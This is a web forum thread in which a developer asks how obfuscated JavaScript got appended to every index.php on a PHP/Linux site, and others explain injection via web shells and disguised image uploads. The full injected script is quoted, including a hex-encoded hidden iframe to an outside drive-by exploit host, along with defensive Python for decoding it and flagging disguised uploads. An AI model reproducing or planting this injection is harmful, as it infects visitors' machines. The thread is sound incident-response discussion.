  1. #1
    YuriKolovsky (Hibernator)

    yet another attack on a website, how?!

    yet another attack on a website, this time on a PHP/Linux server. This line of code was added to the end of each of the index.php pages, including every subfolder...

    Code JavaScript:

    <script>
    // first helper: parse a two-character hex pair as a base-16 number
    function v4ae51ba66ac2b(v4ae51ba66b3fa){
        function v4ae51ba66bbca () {var v4ae51ba66c399=16; return v4ae51ba66c399;}
        return(parseInt(v4ae51ba66b3fa,v4ae51ba66bbca()));
    }
    // second helper: walk the hex string two characters at a time and rebuild the hidden markup
    function v4ae51ba66cb69(v4ae51ba66d338){
        var v4ae51ba66db08='';
        for(v4ae51ba66e2d7=0; v4ae51ba66e2d7<v4ae51ba66d338.length; v4ae51ba66e2d7+=2){
            v4ae51ba66db08+=(String.fromCharCode(v4ae51ba66ac2b(v4ae51ba66d338.substr(v4ae51ba66e2d7, 2))));
        }
        return v4ae51ba66db08;
    }
    // the hex argument is the encoded <iframe>; it is written into the page when the script runs
    document.write(v4ae51ba66cb69('3C696672616D65206E616D653D2765613338393636373627207372633D27687474703A2F2F666F7274726166662E636F6D2F676F2E7068703F7369643D31272077696474683D353639206865696768743D313332207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));
    </script>

    then every page loaded triggered a "Virus Js/psyme Found" alert in my antivirus.
    the database seems to be correct (does not look like SQL injection)

    my question is, HOW ARE THEY DOING THIS!??!

  2. #2
    YuriKolovsky (Hibernator)
    I have decoded it this far...

    Code JavaScript:

    <script>
    function v4ae51ba66ac2b(v4ae51ba66b3fa){
        function v4ae51ba66bbca () {var v4ae51ba66c399=16; return v4ae51ba66c399;}
        return(parseInt(v4ae51ba66b3fa,v4ae51ba66bbca()));
    }
    function v4ae51ba66cb69(v4ae51ba66d338){
        var v4ae51ba66db08='';
        for(v4ae51ba66e2d7=0; v4ae51ba66e2d7<v4ae51ba66d338.length; v4ae51ba66e2d7+=2){
            v4ae51ba66db08+=(String.fromCharCode(v4ae51ba66ac2b(v4ae51ba66d338.substr(v4ae51ba66e2d7, 2))));
        }
        return v4ae51ba66db08;
    }
    document.write(v4ae51ba66cb69('<iframe name='ea3896676' src='http://fortraff.com/go.php?sid=1' width=569 height=132 style='display:none'></iframe>'));
    </script>


    Yet I still have no idea what encoding "v4ae51ba66ac2b" is in...
    and I'm still clueless about how they inserted this on my pages, so any insight is greatly appreciated.
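A decoder for the hex-pair scheme used by the script above, plus a sweep that pulls such payloads out of a page's source, as an added example (not code from either poster). The sample page is constructed; the hex argument is the one from post #1.

```python
import re

# The two helper functions in the injected script reduce to parseInt(pair, 16)
# followed by String.fromCharCode, applied over the quoted string two characters
# at a time. hex_pairs_to_text() does the same in Python. Example code written for
# this thread, not from the original posts.

def hex_pairs_to_text(blob: str) -> str:
    """Decode a run of two-character hex pairs into text."""
    if len(blob) % 2:
        raise ValueError("odd-length hex blob")
    return "".join(chr(int(blob[i:i + 2], 16)) for i in range(0, len(blob), 2))

# Function names are random per infection, so match the shape of the call,
# document.write(<anything>('<hex>')), and capture the hex argument.
WRITE_CALL = re.compile(r"document\.write\(\s*\w+\(\s*'([0-9A-Fa-f]+)'\s*\)\s*\)")
IFRAME_SRC = re.compile(r"<iframe[^>]*\bsrc=['\"]([^'\"]+)['\"]", re.IGNORECASE)

def find_hidden_iframes(page_source: str) -> list:
    """Return one dict per decoded payload (offset, decoded text, iframe src
    when the payload is an iframe). Run it over the source of each index.php."""
    findings = []
    for m in WRITE_CALL.finditer(page_source):
        decoded = hex_pairs_to_text(m.group(1))
        src = IFRAME_SRC.search(decoded)
        findings.append({"offset": m.start(), "decoded": decoded,
                         "src": src.group(1) if src else None})
    return findings

# The hex argument exactly as it appears in post #1, wrapped in a constructed page.
PAYLOAD_HEX = (
    "3C696672616D65206E616D653D276561333839363637362720"
    "7372633D27687474703A2F2F666F7274726166662E636F6D2F676F2E7068703F7369643D312720"
    "77696474683D353639206865696768743D31333220"
    "7374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E"
)
SAMPLE_PAGE = ("<html><body><p>site content</p></body></html>\n"
               "<script>document.write(v4ae51ba66cb69('" + PAYLOAD_HEX + "'));</script>")

if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_PAGE):
        print(f["offset"], f["src"], f["decoded"])
```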

  3. #3
    Crazybanana (SitePoint Wizard)
    all this does is execute two exploits. One being the infamous "directshow" exploit, while the other being the equally infamous "pdf" exploit. you can read more about it in this earlier post about it.

    This script/iframe uses another crypted script to try to hide its content, but in the end it triggers those same type of exploits (pdf & directshow)

    and I guess it's the same 'ol story about this attack, as it goes something like this:

    man runs a webpage, premade script or CMS/forums etc which has a vulnerability. scriptkiddie runs an exploit scanner/vulnerability scanner (c99shell/c99madshell or similar) and while scanning ip ranges he finds a vulnerable site of yours, he then goes into action and triggers an injection attack rewriting some pages with an IFRAME which again triggers the file containing the exploit.. the exploit is then triggered by all visitors of the certain page(s) and everyone vulnerable to this exploit is infected and will infect others etc etc..and etc......

    anyway, clean your files and folders and replace them with new fresh ones (and not an infected backup), update every script, cms/services etc and even change passwords. also do a search and scan on your local files/puter.
    Who's to doom when the judge himself is dragged before the bar


  4. #4
    YuriKolovsky (Hibernator)
    what happened:
    well, this was a website I worked on, and I delivered the code for the website as promised... the server setup and all that he did himself...

    suddenly one day he tells me that his antivirus alerts him of viruses when he loads the site
    I open the site in firefox sandboxed, check the source, see the script at the end, save a sample file in a safe folder, replace all other files with backed up clean files

    Quote Originally Posted by Crazybanana
    man runs a webpage, premade script or CMS/forums etc which has a vulnerability
    nope, custom code, and I took care not to have any vulnerabilities!
    I mean the real question is, how can the hacker modify my files, even the static files... that don't contain any scripts??

    Quote Originally Posted by Crazybanana
    anyway, clean your files and folders and replace them with new fresh ones (and not an infected backup), update every script,cms/services etc and even change passwords. also do a search and scan on your local files/puter.
    yea yea, all done.

    thanks for the link, I haven't read it yet, let's see if it tells me how to prevent this in the future.

    edit:
    your link leads me to some blank sitepoint post that triggers a vulnerability alert...

    edit:
    currently reading about the 2 exploits.
    I would really like to know about this in depth.

  5. #5
    Crazybanana (SitePoint Wizard)
    Quote Originally Posted by YuriKolovsky
    what happened:
    well, this was a website i worked on, and i delivered the code for the website as promised...the server setup and all that he did himself...
    so he can have some other vulnerabilities in SW/scripts/server that you do not know of

    Quote Originally Posted by YuriKolovsky
    suddenly one day he tells me that his antivirus alerts him of viruses when he loads the site
    i open the site in firefox sandboxed, check the source, see the script at the end, save a sample file in a safe folder, replace all other files with backed up clean files
    he can have a virus on his local puter, or he may run some other services or software/scripts on his server which are vulnerable

    Quote Originally Posted by YuriKolovsky
    nope, custom code, and i took care not to have any vulnerabilities!
    i mean the real question is, how can the hacker modify my files, even the static files... that don't contain any scripts??
    maybe it's not about your code, maybe your customer has a service, software or script made by others on his server.

    I could suggest that the attacker brute-forced the pw, but as this type of attack is very common and almost always (AFAIK) uses some security/vulnerability scanners to discover vulnerable servers/webpages/scripts, I would say this is done remotely with perhaps the c99shell or c99madshell or some similar scanners.

    It doesn't have to be a script, it can be a virus on his pc, or it can be a service that runs on the server that needs to be updated or it can be some type of script from some type of SW.


    Quote Originally Posted by YuriKolovsky
    edit:
    your link leads me to some blank sitepoint post that triggers a vulnerability alert...
    ?

    Quote Originally Posted by YuriKolovsky
    edit:
    currently reading about the 2 exploits.
    i would really like to know about this in depth.
    they are using quite advanced techniques

    you can read some more about it here and here


  6. #6
    Crazybanana (SitePoint Wizard)
    Quote Originally Posted by YuriKolovsky View Post
    edit:
    your link leads me to some blank sitepoint post that triggers a vulnerability alert...
    no worry, your virus app is detecting the code/scripts that have been used in the thread.


  7. #7
    YuriKolovsky (Hibernator)
    Quote Originally Posted by Crazybanana
    no worry, your virus app are detecting the code/scripts that's been used in the thread.
    oh :O, ok, I'll disable the antivirus temporarily.

    thanks again for the details! I'll post if I have any more questions after reading the articles.

  8. #8
    YuriKolovsky (Hibernator)
    as a parallel question [while I'm reading all the articles/posts] what would you do in this situation? after replacing the affected files that is.

  9. #9
    Crazybanana (SitePoint Wizard)
    Quote Originally Posted by YuriKolovsky
    as a parallel question [while im reading all the articles/posts] what would you do in this situation? after replacing the affected files that is.
    I would make sure my client told me everything and that he really did clean his files and folders, I would also ask him to look for suspicious files/jpg/gif/swf/mov etc as some backdoor may be installed and using a fake extension to hide.

    I would also make sure he updated any sw running on his server and make sure he scanned his local puter and checked his files before uploading new ones.

    But before this I would ask him to change his passwords for that server.

    I would try as best I could to urge him to check really hard for any unknown or suspicious files as this is a popular method of hiding scripts and backdoors.

    Ask him to check all the logs - and wish him good luck

    many people get hacked again and again because they back up their files with infected ones.


  10. #10
    YuriKolovsky (Hibernator)
    can I ask you, how are they activating the backdoors? is it with an http request?

  11. #11
    Crazybanana (SitePoint Wizard)
    in many cases they use an http request both to look for vulnerabilities, execute, upload, inject and you name it

    the shell I mention is just one thing in a packet with tools from some Russians.
    the packet I am talking about has a few shell scripts, vulnerability scanners and exploits in it, but there are so many tools out there.

    you can scan (or even do a google search for specific urls) to find webpages that may be vulnerable.
    the scanners scan for various known vulnerabilities and when it finds one, you can read what and pick a suitable exploit from the collection within the library - or go look for it other places.

    some of these you can put directly in the address bar of the browser while others can be executed from the vulnerability scanner.

    think of this scenario:

    you find a host that you can upload an image to.. you disguise the php file as an image and upload it, you go to the address of it and then run it like a full function php script (c99shell,r57,madshell etc) this has an advanced control panel which lets you upload files using ftp, lets you scan other hosts for vulnerabilities, run http requests, execute and run code etc..., you can even control it from IRC

    now you can use this host and tools to scan other hosts for vulnerabilities and execute various exploits against them.

    as for injection attacks there are tons of queries laying around you can download to test it out yourself, just do a google search. there are tutorials and papers written to ensure your success doing it, it is so well documented that if you really wanna try doing something like this, you will not fail - even if you are quite a novice.

    In many cases a cut 'n paste is all that's needed... that, and people not updating their systems is what makes it all scary!
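Post #9 advises looking for backdoors hiding behind a fake jpg/gif/swf extension, and post #11 describes the PHP-file-disguised-as-an-image upload that puts them there. The check below is an added example written for this thread (not code from either poster): it compares a file's extension with its real header bytes and looks for PHP markers in the content. The directory path and sample bytes are hypothetical.

```python
import os
import re

# Leading bytes a genuine file of each type must start with. A shell renamed to
# .jpg usually fails this; a shell with a real GIF header pasted in front passes it
# but is caught by the PHP marker search below.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".swf": (b"FWS", b"CWS", b"ZWS"),
}
PHP_MARKERS = re.compile(rb"<\?php|<\?=|\beval\s*\(|base64_decode\s*\(", re.IGNORECASE)
DOUBLE_EXT = re.compile(r"\.php\d?\.", re.IGNORECASE)   # e.g. name.php.jpg

def classify_upload(name: str, data: bytes) -> list:
    """Return the reasons a file looks suspicious; an empty list means it passed."""
    reasons = []
    ext = os.path.splitext(name)[1].lower()
    expected = MAGIC.get(ext)
    if expected is not None and not any(data.startswith(m) for m in expected):
        reasons.append(f"header does not match {ext}")
    if PHP_MARKERS.search(data):
        reasons.append("contains PHP code")
    if DOUBLE_EXT.search(name):
        reasons.append("double extension with .php")
    return reasons

def sweep(directory: str) -> dict:
    """Walk an upload directory and map each flagged path to its reasons."""
    flagged = {}
    for root, _dirs, files in os.walk(directory):
        for fn in files:
            path = os.path.join(root, fn)
            with open(path, "rb") as fh:
                head = fh.read(65536)   # headers and shell code sit near the start
            reasons = classify_upload(fn, head)
            if reasons:
                flagged[path] = reasons
    return flagged

if __name__ == "__main__":
    # hypothetical path; point this at the site's upload/image directory
    for path, why in sweep("/var/www/html/uploads").items():
        print(path, "->", ", ".join(why))
```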


